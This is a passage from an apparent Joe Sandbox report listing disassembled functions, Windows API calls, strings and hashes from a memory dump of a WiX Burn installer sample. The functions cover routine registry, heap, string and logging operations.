                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3662877508-3612885251
                                                            • Opcode ID: 28a9c9869225b26a2a91e72167b59888ec4a0c56873c6261dc08c9d2f8242765
                                                            • Instruction ID: ff45cf0fbbb943b8991bd45daeab311fd12e8e17828df819b37ab2b196a0380d
                                                            • Opcode Fuzzy Hash: 28a9c9869225b26a2a91e72167b59888ec4a0c56873c6261dc08c9d2f8242765
                                                            • Instruction Fuzzy Hash: CC314E3262022AABD7208EA5CC44A6BBB95FF15774B118324FD1DDB2AAE771CC4097D1
                                                            Function 008B94FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008B95D5
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 008B9610
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B962C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9639
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9646
                                                              • Part of subcall function 008B0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008B95C2,00000001), ref: 008B0FED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close$InfoOpenQuery
                                                            • String ID:
                                                            • API String ID: 796878624-0
                                                            • Opcode ID: 19028165aecc25b99e6d792b35c845dd514886712690021f0e9dabcdc3c71813
                                                            • Instruction ID: 3ca3d5b19858b8174560cc002805cb78f076c5a94de80c89b0739fdc0dbf26ee
                                                            • Opcode Fuzzy Hash: 19028165aecc25b99e6d792b35c845dd514886712690021f0e9dabcdc3c71813
                                                            • Instruction Fuzzy Hash: C3414D72C0122DFFCF21AF988C819EEFBB9FF25750F11416AEA54B6221C7314E509A90
                                                            Function 00878A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?,?,0087972D,?,?), ref: 00878A27
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?,?,0087972D,?,?), ref: 00878A2F
                                                            • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878A7E
                                                            • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878AE0
                                                            • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00878BC8,0087972D,?,0087972D,?), ref: 00878B0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString$lstrlen
                                                            • String ID:
                                                            • API String ID: 1657112622-0
                                                            • Opcode ID: 5e84bdaeea03d4cade988b665bba1906732187985d0916e999021cfb9aa8df9f
                                                            • Instruction ID: 9a4f25cc35fa42fa5ba3908fd7b3a603d1d8cc605930d0a028ce1efea80d220f
                                                            • Opcode Fuzzy Hash: 5e84bdaeea03d4cade988b665bba1906732187985d0916e999021cfb9aa8df9f
                                                            • Instruction Fuzzy Hash: B0315172A40118FFCF118E59CC899AE7F6AFB493A4F14C416F90DD7114CA71D990DBA2
                                                            Function 008774B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(008753BD,WixBundleOriginalSource,?,?,0088A623,840F01E8,WixBundleOriginalSource,?,008DAA90,?,00000000,00875445,00000001,?,?,00875445), ref: 008774C3
                                                            • LeaveCriticalSection.KERNEL32(008753BD,008753BD,00000000,00000000,?,?,0088A623,840F01E8,WixBundleOriginalSource,?,008DAA90,?,00000000,00875445,00000001,?), ref: 0087752A
                                                            Strings
                                                            • WixBundleOriginalSource, xrefs: 008774BF
                                                            • Failed to get value as string for variable: %ls, xrefs: 00877519
                                                            • Failed to get value of variable: %ls, xrefs: 008774FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                            • API String ID: 3168844106-30613933
                                                            • Opcode ID: b0f06f9b86532196e0aeb1ede9ba770a347164cb92c2b7cff2e0f8aed97ef497
                                                            • Instruction ID: 9de77afa80edc902f3a61dad33505669f99eece4067d139a0979c66ac398d0ac
                                                            • Opcode Fuzzy Hash: b0f06f9b86532196e0aeb1ede9ba770a347164cb92c2b7cff2e0f8aed97ef497
                                                            • Instruction Fuzzy Hash: FB014476944129ABCF229B58CC09A9E3B68FF00765F148161FD08EA221C376DE50EA99
                                                            Function 0089D152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0089D148,00000000), ref: 0089D16D
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0089D148,00000000), ref: 0089D179
                                                            • CloseHandle.KERNEL32(008BB518,00000000,?,00000000,?,0089D148,00000000), ref: 0089D186
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0089D148,00000000), ref: 0089D193
                                                            • UnmapViewOfFile.KERNEL32(008BB4E8,00000000,?,0089D148,00000000), ref: 0089D1A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$FileUnmapView
                                                            • String ID:
                                                            • API String ID: 260491571-0
                                                            • Opcode ID: 750697f53c7b80d905cc3779a81c3e5bf96b316fd95c1b5862298568e2417faf
                                                            • Instruction ID: fe5ac161fab4c39d1e90223dc0b108481f158b6a6921a2824afd1bf0a7323762
                                                            • Opcode Fuzzy Hash: 750697f53c7b80d905cc3779a81c3e5bf96b316fd95c1b5862298568e2417faf
                                                            • Instruction Fuzzy Hash: 4B01F672400B15DFCB31AFA6D880816FBE9FF50711319C93EE1AA92930C371A880DF44
                                                            Function 008B8713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008B8820
                                                            • GetLastError.KERNEL32 ref: 008B882A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$ErrorFileLastSystem
                                                            • String ID: clbcatq.dll$timeutil.cpp
                                                            • API String ID: 2781989572-961924111
                                                            • Opcode ID: 3551d79ca39a62c89d8261d936a5e4cff2a15bfe6d19e34f46511215f9797dba
                                                            • Instruction ID: 2bd728f3045f33857d0a56313a6ff3744c364d1e9952f2ba4d7f5fa5d522d455
                                                            • Opcode Fuzzy Hash: 3551d79ca39a62c89d8261d936a5e4cff2a15bfe6d19e34f46511215f9797dba
                                                            • Instruction Fuzzy Hash: E641D166E0021AE6D720AAB88C45BFF77ACFF55700F644529A501E7394EE35CE00C3E6
                                                            Function 008B36CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(000002C0), ref: 008B36E6
                                                            • SysAllocString.OLEAUT32(?), ref: 008B36F6
                                                            • VariantClear.OLEAUT32(?), ref: 008B37D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearInitString
                                                            • String ID: xmlutil.cpp
                                                            • API String ID: 2213243845-1270936966
                                                            • Opcode ID: cfb449389d0580e9cf5dd012bc7fb3ec1c35628d5c87c8c9c616c4edc4e01247
                                                            • Instruction ID: 858b3f6a854f6c88a70d96ffee67688ebd6cb7fb227e44162be88010dfea795a
                                                            • Opcode Fuzzy Hash: cfb449389d0580e9cf5dd012bc7fb3ec1c35628d5c87c8c9c616c4edc4e01247
                                                            • Instruction Fuzzy Hash: 4D4146F5900229ABCB219FA5C888EEBB7A8FF05710F1541B5FC15EB311DA34DE008B95
                                                            Function 008B0E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00898E1B), ref: 008B0EAA
                                                            • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00898E1B,00000000), ref: 008B0EC8
                                                            • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00898E1B,00000000,00000000,00000000), ref: 008B0F1E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Enum$InfoQuery
                                                            • String ID: regutil.cpp
                                                            • API String ID: 73471667-955085611
                                                            • Opcode ID: 751d06c0e7c561b9aec717d922f4dd3912d34ca21c2b5d94f9b822ade3b26395
                                                            • Instruction ID: a13a5764b293a4ef4de4d11fa745e1abd56a51f8049bf360c6965bb309967cff
                                                            • Opcode Fuzzy Hash: 751d06c0e7c561b9aec717d922f4dd3912d34ca21c2b5d94f9b822ade3b26395
                                                            • Instruction Fuzzy Hash: 81318176E0112AFBEB218A988D849FFB76DFF04760F154166BD04EB350DB71DE109AA0
                                                            Function 00898B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00898E57,00000000,00000000), ref: 00898BD4
                                                            Strings
                                                            • Failed to ensure there is space for related bundles., xrefs: 00898B87
                                                            • Failed to open uninstall key for potential related bundle: %ls, xrefs: 00898B43
                                                            • Failed to initialize package from related bundle id: %ls, xrefs: 00898BBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                            • API String ID: 47109696-1717420724
                                                            • Opcode ID: 152eb7a3e81c1474e19a2dbf9cf3bb13a5ed9e1e0add782cdf95efef2242164b
                                                            • Instruction ID: 92d870358e9ceba543e6ecaf4d39d4108272ef5c20c029185fae449a193065bd
                                                            • Opcode Fuzzy Hash: 152eb7a3e81c1474e19a2dbf9cf3bb13a5ed9e1e0add782cdf95efef2242164b
                                                            • Instruction Fuzzy Hash: D221A17294051AFBDF12AE48CC06FEE7B78FF06325F184155F910E6250DB759A20EB91
                                                            Function 00873B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8), ref: 00873B33
                                                            • HeapReAlloc.KERNEL32(00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100,?,80004005,00000000), ref: 00873B3A
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            • _memcpy_s.LIBCMT ref: 00873B86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                            • String ID: memutil.cpp
                                                            • API String ID: 3406509257-2429405624
                                                            • Opcode ID: c66e3fe7e0aa00ab516e1f88c26672bb6c21df94062ffb1129292c2a294369e7
                                                            • Instruction ID: 8df4d60a53e9ac6614f533ac16fdb2b6df029e69f0a319e3e26a26973a801be6
                                                            • Opcode Fuzzy Hash: c66e3fe7e0aa00ab516e1f88c26672bb6c21df94062ffb1129292c2a294369e7
                                                            • Instruction Fuzzy Hash: F811D231505518ABCB226E6CCC49DAE3A59FB44774B058224F81CDB26AD672CF14B2D3
                                                            Function 008B894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 008B8991
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B89B9
                                                            • GetLastError.KERNEL32 ref: 008B89C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastTime$FileSystem
                                                            • String ID: inetutil.cpp
                                                            • API String ID: 1528435940-2900720265
                                                            • Opcode ID: 7629d11e6468ad253a22ea8e50b2a3072d47ad1f7d9fd4947189b037f6b4c257
                                                            • Instruction ID: a539a19cd1c31d73b293f8b8408bd8084f96a45db11dbfddffff1aa5f9aaa3c0
                                                            • Opcode Fuzzy Hash: 7629d11e6468ad253a22ea8e50b2a3072d47ad1f7d9fd4947189b037f6b4c257
                                                            • Instruction Fuzzy Hash: 5D118473A0152AA7D7209AA98C45BBFBFACFB44751F110125AE45F7240EA749D04C6E2
                                                            Function 00883AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00883FB5,feclient.dll,?,00000000,?,?,?,00874B12), ref: 00883B42
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                            • API String ID: 1586453840-3596319545
                                                            • Opcode ID: cd660cb292e55aa8d9c2f228d25dd98c8eb2a80dd5b77fdb5a5584a598f72750
                                                            • Instruction ID: 762702ae239a1024ea60d62ab2e6c4c819388fbade6270adb03eda5fb8f0ad20
                                                            • Opcode Fuzzy Hash: cd660cb292e55aa8d9c2f228d25dd98c8eb2a80dd5b77fdb5a5584a598f72750
                                                            • Instruction Fuzzy Hash: DA1193B2B40208BBDB21FA95DC86EBEB7B8FB10F20F804065E500EB191D6719F81D710
                                                            Function 008B0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(008912CF,00000000,00000000,?,?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.), ref: 008B0776
                                                            • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F), ref: 008B07B2
                                                            • GetLastError.KERNEL32(?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008B07BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWritelstrlen
                                                            • String ID: logutil.cpp
                                                            • API String ID: 606256338-3545173039
                                                            • Opcode ID: cc54368b652c870ee1a42d4190965891596ba17a51524cf0715ef08c39d6c50e
                                                            • Instruction ID: c940e610e581ed69256645079a479aed1edb80da2f90818737680f88bebc9118
                                                            • Opcode Fuzzy Hash: cc54368b652c870ee1a42d4190965891596ba17a51524cf0715ef08c39d6c50e
                                                            • Instruction Fuzzy Hash: B0119172A41129AB83209A698D84AEFFB6CFB44760B114325FD04E7340EE71AD00CEE4
                                                            Function 0087120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0087523F,00000000,?), ref: 00871248
                                                            • GetLastError.KERNEL32(?,?,?,0087523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00871252
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ArgvCommandErrorLastLine
                                                            • String ID: apputil.cpp$ignored
                                                            • API String ID: 3459693003-568828354
                                                            • Opcode ID: 67195e019901bba3ab15edb39ebd62ab5d54775089db7ff1d93bb75392c6140d
                                                            • Instruction ID: 97ac600e66956ce931046548296782b169871c001deabf1059dae0606cbd0579
                                                            • Opcode Fuzzy Hash: 67195e019901bba3ab15edb39ebd62ab5d54775089db7ff1d93bb75392c6140d
                                                            • Instruction Fuzzy Hash: AA119D76910229AB8F21DB9DC809DAEBBB8FF14750B018155FD08E7711E770DE009AA1
                                                            Function 0089D1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0089D3EE,00000000,00000000,00000000,?), ref: 0089D1C3
                                                            • ReleaseMutex.KERNEL32(?,?,0089D3EE,00000000,00000000,00000000,?), ref: 0089D24A
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Strings
                                                            • NetFxChainer.cpp, xrefs: 0089D208
                                                            • Failed to allocate memory for message data, xrefs: 0089D212
                                                            Memory Dump Source
